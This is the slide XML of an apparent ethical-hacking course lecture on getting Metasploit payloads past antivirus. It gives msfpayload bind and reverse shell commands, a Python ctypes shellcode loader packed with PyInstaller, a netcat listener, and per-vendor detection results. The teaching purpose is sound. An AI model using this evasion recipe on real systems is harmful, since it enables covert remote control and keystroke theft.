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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="357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258" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="259" r:id="rId14"/>
    <p:sldId id="263" r:id="rId15"/>
    <p:sldId id="264" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="265" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="269" r:id="rId20"/>
    <p:sldId id="270" r:id="rId21"/>
    <p:sldId id="274" r:id="rId22"/>
    <p:sldId id="260" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="262" r:id="rId25"/>
    <p:sldId id="271" r:id="rId26"/>
    <p:sldId id="272" r:id="rId27"/>
    <p:sldId id="275" r:id="rId28"/>
    <p:sldId id="276" r:id="rId29"/>
    <p:sldId id="273" r:id="rId30"/>
    <p:sldId id="280" r:id="rId31"/>
    <p:sldId id="278" r:id="rId32"/>
    <p:sldId id="277" r:id="rId33"/>
    <p:sldId id="288" r:id="rId34"/>
    <p:sldId id="281" r:id="rId35"/>
    <p:sldId id="283" r:id="rId36"/>
    <p:sldId id="285" r:id="rId37"/>
    <p:sldId id="284" r:id="rId38"/>
    <p:sldId id="286" r:id="rId39"/>
    <p:sldId id="289" r:id="rId40"/>
    <p:sldId id="292" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="295" r:id="rId43"/>
    <p:sldId id="302" r:id="rId44"/>
    <p:sldId id="303" r:id="rId45"/>
    <p:sldId id="300" r:id="rId46"/>
    <p:sldId id="290" r:id="rId47"/>
    <p:sldId id="291" r:id="rId48"/>
    <p:sldId id="293" r:id="rId49"/>
    <p:sldId id="294" r:id="rId50"/>
    <p:sldId id="296" r:id="rId51"/>
    <p:sldId id="297" r:id="rId52"/>
    <p:sldId id="298" r:id="rId53"/>
    <p:sldId id="304" r:id="rId54"/>
    <p:sldId id="305" r:id="rId55"/>
    <p:sldId id="306" r:id="rId56"/>
    <p:sldId id="337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46" r:id="rId66"/>
    <p:sldId id="347" r:id="rId67"/>
    <p:sldId id="341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90557-D63B-1640-95DF-DE44DC0E7002}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/18/15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67C26-A583-A940-8C70-3004F49055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30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4/18/15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6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4/18/15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2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4/18/15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3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4/18/15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84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4/18/15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5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4/18/15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4/18/15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7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4/18/15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8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4/18/15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03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4/18/15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03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C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/18/15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5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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/18/15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AF429-3049-8E49-8E1A-3EF3D6C5F8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42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779" y="149411"/>
            <a:ext cx="8748888" cy="4198719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Violent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Python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2533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6-22 at 2.10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924"/>
            <a:ext cx="9144000" cy="26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95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78857"/>
            <a:ext cx="7772400" cy="3193143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Antivirus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Ungh!  Good God y'all...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smtClean="0"/>
              <a:t>What is it GOOD For?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4589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2 at 9.18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1032002"/>
            <a:ext cx="7946571" cy="2533445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4-05-22 at 9.17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7" y="3970191"/>
            <a:ext cx="8146143" cy="178514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43949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Mikko Hypponen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07-28 at 9.36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13" y="1786838"/>
            <a:ext cx="71628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00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Metasploit Payloads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7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Metasploit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Hundreds of payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The simplest one: bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listens on a TCP port for commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2014-05-22 at 11.21.3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87"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491702" y="3733375"/>
            <a:ext cx="8195098" cy="21435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1333" y="4615555"/>
            <a:ext cx="4289778" cy="369332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7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Reverse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command to produce very simple Windows EXE malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="p8-av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0985"/>
            <a:ext cx="8490857" cy="21457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8221" y="3405946"/>
            <a:ext cx="6290029" cy="30880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07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Antivirus Catches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8-av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84" y="2030583"/>
            <a:ext cx="7115904" cy="383491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61512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Norton v. Shell.exe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2 at 10.18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28" y="1600200"/>
            <a:ext cx="6679693" cy="484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1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Norton Identifies the Metasploit Packer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2 at 10.19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5784"/>
            <a:ext cx="8066956" cy="367566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16350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2 at 9.11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71" y="2004786"/>
            <a:ext cx="6350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2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VirusTotal: 37/49 Detections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8-av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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="718085" y="1417638"/>
            <a:ext cx="7968715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3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8000" y="1955801"/>
            <a:ext cx="2768600" cy="2457450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to Become 007</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="rogermooreliveandletd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000" y="369543"/>
            <a:ext cx="4950000" cy="61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3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2 at 9.27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54" y="402770"/>
            <a:ext cx="5050303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5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58333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp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4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Metasploit Payloads to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5-22 at 11.30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1153"/>
            <a:ext cx="8366796" cy="288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4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Ctypes Python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2 at 11.31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6986"/>
            <a:ext cx="8229600" cy="1599787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-22 at 11.32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85049"/>
            <a:ext cx="8229600" cy="112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8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 it on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these  things, in order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python 2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyWin32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pip-Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyInstaller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This creates an EXE file that listens on a TCP port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-22 at 11.35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9452"/>
            <a:ext cx="9144000" cy="99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1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800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193800"/>
            <a:ext cx="8890000" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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msfpayload windows/shell_bind_tcp C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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nano foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to</a:t>
            </a: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from ctypes import *</a:t>
            </a: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shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="45720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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))</a:t>
            </a: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shell = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRP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shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114396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800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5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Windows, in pip-Win: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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>name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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile --noconsole foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101980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VirusTotal: 1/50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8-av2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1" b="7039"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777203" y="1417638"/>
            <a:ext cx="7741241" cy="519511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70877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CNIT 124</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced Ethical Hacking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violent-pyth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74" y="1783815"/>
            <a:ext cx="3635907" cy="451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92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Norton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Tweeted about this, and @NortonSupport replied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@NortonSupport gave me a link for a 30-day trial version :)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53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Norton Wins!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3 at 5.01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44" y="1600200"/>
            <a:ext cx="6740774" cy="472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8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Kaspersky Wins!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Avast! doesn't detect it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky detects it as HEUR:Trojan.Win32.Generic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-23 at 4.46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77" y="3420343"/>
            <a:ext cx="5051777" cy="32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3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58333"/>
            <a:ext cx="7772400" cy="41910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Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a 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5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norton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11" y="373945"/>
            <a:ext cx="40640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0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orton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67" y="437445"/>
            <a:ext cx="4025900" cy="30480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norton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67" y="3616678"/>
            <a:ext cx="40386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5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800"/>
          </a:xfrm>
        </p:spPr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193800"/>
            <a:ext cx="8890000" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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cp foo foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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nano foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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x=raw_input("Press Enter to continue")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win: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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-name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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile foo2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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054977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Norton, Avast, &amp; MSE Lose!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3 at 5.22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78" y="1600200"/>
            <a:ext cx="6335889" cy="497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9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Kaspersky Wins!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3 at 5.19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94" y="1600200"/>
            <a:ext cx="7103505" cy="47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58333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in two stages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no 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5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Violent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coding principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exception handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modular design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Commenting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flow charts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FORGET THEM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66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Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Al these failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>360 Internet Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky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72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Mikko?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7-28 at 9.36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31" y="1945572"/>
            <a:ext cx="71628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9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F-Secure Wins!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Fsec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7" y="1600200"/>
            <a:ext cx="6279444" cy="498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7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AV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7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98333"/>
            <a:ext cx="8229600" cy="2527830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posted April 3, 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No reply from AV vendors, but Norton improved its detection after that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now a delay is required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.34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1828"/>
            <a:ext cx="8229600" cy="779368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-24 at 7.34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353778" cy="164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3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58333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a 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1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800"/>
          </a:xfrm>
        </p:spPr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193800"/>
            <a:ext cx="8890000" cy="5664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On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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msfpayload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>192.168.119.252 C &gt; rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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nano rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to</a:t>
            </a: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x=raw_input("Press Enter to continue")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ctypes import *</a:t>
            </a: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shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="45720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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))</a:t>
            </a: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shell = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186603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9800"/>
          </a:xfrm>
        </p:spPr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5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win: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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller --onefile rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nc –lp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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26403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Norton Loses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3 at 6.06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89" y="1600200"/>
            <a:ext cx="6505222" cy="463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30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Kaspersky Wins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3 at 6.07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11" y="2005486"/>
            <a:ext cx="7366000" cy="401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8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Violent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hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We are here to BREAK STUFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It should be fast and easy for a complete novice to hack together a simple script to do something fun!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022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Malware Protection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4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03333"/>
            <a:ext cx="8229600" cy="62283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ty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ChrisAbdalla_1 from HP ESP TippingPoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.23.3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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="791633" y="273050"/>
            <a:ext cx="6997700" cy="2238728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9" name="Picture 8" descr="Screen Shot 2014-05-24 at 7.23.54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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="310445" y="2659239"/>
            <a:ext cx="8573911" cy="266739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270674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7222"/>
            <a:ext cx="8229600" cy="3938941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A friend in the financial industry tested Evil.exe on a system protected by FireEye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FireEye gives no alerts and lets it post keystrokes right to Pastebin</a:t>
            </a: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77" y="201259"/>
